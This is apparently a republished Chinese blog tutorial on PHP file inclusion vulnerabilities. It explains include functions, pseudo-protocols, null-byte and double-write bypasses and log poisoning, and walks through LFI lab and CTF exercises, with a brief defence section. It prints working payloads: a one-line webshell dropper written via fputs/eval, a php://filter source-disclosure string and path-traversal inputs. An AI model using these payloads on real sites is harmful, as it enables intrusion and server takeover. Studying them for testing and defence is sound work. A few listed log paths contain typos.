文件包含漏洞---php协议

Posted Hello_date

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了文件包含漏洞---php协议相关的知识,希望对你有一定的参考价值。

一、原理

  1、概念:在php代码中,总会有一些代码我们会经常用到,这时引入了文件包含函数,可以通过文件包含函数把这些代码文件包含进来,直接使用文件中的代码,这样提高了我们的工作效率。

  2、文件包含函数:

    include():如果发生错误,会产生一个警告然后继续执行脚本

    include_once():与include()相同,如果文件之前被包含过则不再包含

    require():会停止执行代码

    require_once():如果文件之前被包含过则不再包含

  3、类型:本地文件包含、远程文件包含(url的形式进行)

        配置文件参数:allow_url_fopen:为ON时,能读取远程文件,

          Allow_url_include:为ON时,就可以使用include和require等方式包含远程文件

  4、利用方式——伪协议

    # file://  协议用户访问本地文件系统,使用方法:?file:// [文件的绝对路径和文件名]

    # php://input  可以访问请求的原始数据的只读流,将post请求的数据当作php代码执行

    # php://filter  元封装器,读取源代码并以base64编码方式输出

    # zip://, bzip2://, zlib://   属于压缩流,可以访问压缩文件中的子文件,使用方法:zip:// [压缩文件绝对路径]#[压缩文件内的子文件名]

    # data://  类似于php://input,可以让用户来控制输入流

    其他利用方法:(绕过方式)

    #00截断:windows在读文件名的时候遇到00就会停止

    #长度截断(win:256,linux:4096)

    #包含日志文件:传入的参数值如果会保存到日志文件中,我们可以把木马传入到日志文件中,知道日志的路径就可以进行下一步操作

    #包含session

  5、防御

    #php中使用open_basedir配置限制访问在指定的区域

    #过滤 . (点) / (反斜杠) \\(反斜杠)

    #禁止服务器远程文件包含

    #尽量不要使用动态包含,可以在需要包含的页面固定写上

二、利用LFI环境复现文件包含漏洞

   这是我在github上边下载的,有很多题目要做一些改动才可以实现,所以懂了原理就可以了,用PHP study本地搭建起来就可以复现,

因为我的路径和原本代码的路径不同,所以每复现一个之前都要把文件包含函数里面的路径修改一下,例如:

 

 

  # LFI-1 简单的文件包含

  观察源代码,这是一个简单的文件包含

  我现在网站根目录下传入一个phpinfo的文件,

  

 

 

   根据源码,框中传入的参数是page,我们可以构造payload,得到根目录下的文件内容

  

 

   根据实验,不管文件的后缀名是jpg、txt,都会以php代码执行,所以可知文件包含时与传入文件的类型无关

   

 

   # LFI-2 00截断绕过

  观察源码,

 

   这个参数传入之后构成的路径是:includes/文件.php,我们可以用%00把.php截断,然后利用相对路径进行绕过

  这个题可能是有很多限制,我把includes删除然后把php版本调到5.2.17然后把gpc设置为off才能实现。

  如果我们传入一个一句话,这时就可以用菜刀连接

  # LFI-3 点、斜杠绕过

  观察源码,源码当中取后四位即后缀名与.php比较,如果相同则输出不被允许查看源码的警告,若不同则读取文件内容。

  

 

   我们可以在url的末尾加.(点),因为,在文件命名时,后缀后面加点是会自动去掉的

 

  我们也可以加/.    因为在命名时,/(斜杠)是不允许出现的

 

  # 4 去后缀名绕过

  观察源码,

  

  addslashes()函数:是一个过滤函数

  

 

   参数传入之后构成的url是:includes/class_参数.php

  源码本身就是有.php的后悔,我们可以传参数时舍后缀

  #5 双写绕过

  观察源码,

  

   这段源码过滤了../,我们可以通过双写绕过,即:....//

   #6 文件包含写webshell

   观察源码,

 

   这个和第一个差不多,就是参数是以post的方式提交的,我们只要用post的方法提交参数,就可以发现文件包含

  此时,我们如果传入一个任意文件写入以下代码,执行之后就可以在文件的目录写入一个shell

  <?php fputs ( fopen(\'shell.php\',\'w\') , \'<?php eval($_POST[shell])?>\') ;?>

  这段代码的意思就是新建一个shell.php的文件,写入后面的一句话

  #7 用post的方式做00截断或舍去后缀  ../../../phpinfo.php%00

  #8 post方式做00截断或加./绕过

  #9 post方式做舍去后缀名绕过

  #10 post方式双写绕过

  #11 简单的post方式包含,有一个隐藏的输入框,用隐藏的参数

   #12 简单的get方式包含,有一个隐藏的输入框,用隐藏的参数

  #13 get方式双写绕过

  #14 post方式双写绕过

   注:可能是环境的问题,很多题不能实现,只要懂原理就可以

 

   #包含日志文件获取webshell  

   日志默认路径:

  1、apache+Linux日志默认路径:

    /ect/httpd/logs/access_log 或者 /var/log/httpd/wccess_log

  2、apache+Win2003日志默认路径

    D:\\xampp\\apache\\logs\\access.log

    D:\\xampp\\apache\\logs\\error.log

  3、IIS6.0+Win2003默认日志文件

    C:\\WINDOWS\\system32\\Logfiles

  4、IIs7.0+win2003默认日志文件

    %SystemDrive%\\inetpub\\logs\\LogFiles

  5、nginx日志文件默认路径

    日志文件在用户安装目录logs目录下

      例如安装路径伪/user/nginx,

      拿我的日志文件目录就是在/user/nginx/logs里

   利用方法:我们进行获取的时候首先要知道日志文件的路径,      

 

 

  既然我们申请访问的url会记录到日志中,我们可以在url中写入一句话然后提交,这时,我们就会在日志文件中写入一句话,

  但是一般的浏览器都会编码我们提交的url,

 

 

  我们可以用burpsuit抓包,在url中写入一句话进行提交,就能写入一句话并解析,这样就可以成功获取shell

 三、php伪协议

   #1 用php://filter获取flag

   这里bugku有一个经典的文件包含+php://filter的题目:flag在index里

  在页面上我们可以看到一个按钮链接,点击之后就会跳转到参数file的url

  

 

    这里由参数file可以猜到用php://filter伪协议来读取flag

  我们构造payload:?file=php://filter/read=convert.base64-encode/resource=index.php

  

 

   这里convert.base64-encode是将源码以base64编码,然后读取出来,我解码之后得到

  

 

   这里就能发现flag

   #2 命令执行获取webshell

   如果通过php://input实验发现存在漏洞,可以使用system命令dir查看目录,发现敏感的目录

  然后就可以通过<?php fputs ( fopen(\'shell.php\',\'w\') , \'<?php eval($_POST[shell])?>\') ;?>,写入一句话

  #3

  我们也可以用压缩协议,data协议进行绕过,也可以利用windows的特性,文件名字大于256时后面的内容就会舍弃,来进行绕过。

 

  php协议很常用很强大,这里只是我的一些浅见。

 

 

 

 

以上是关于文件包含漏洞---php协议的主要内容,如果未能解决你的问题,请参考以下文章

详解文件包含漏洞

文件包含漏洞进阶篇

WEB攻防-通用漏洞&文件包含&LFI&RFI&伪协议编码算法&代码审计

CISP-PTE考前练习-文件包含

文件包含练习

BUU 文件包含漏洞-[ACTF2020 新生赛]Include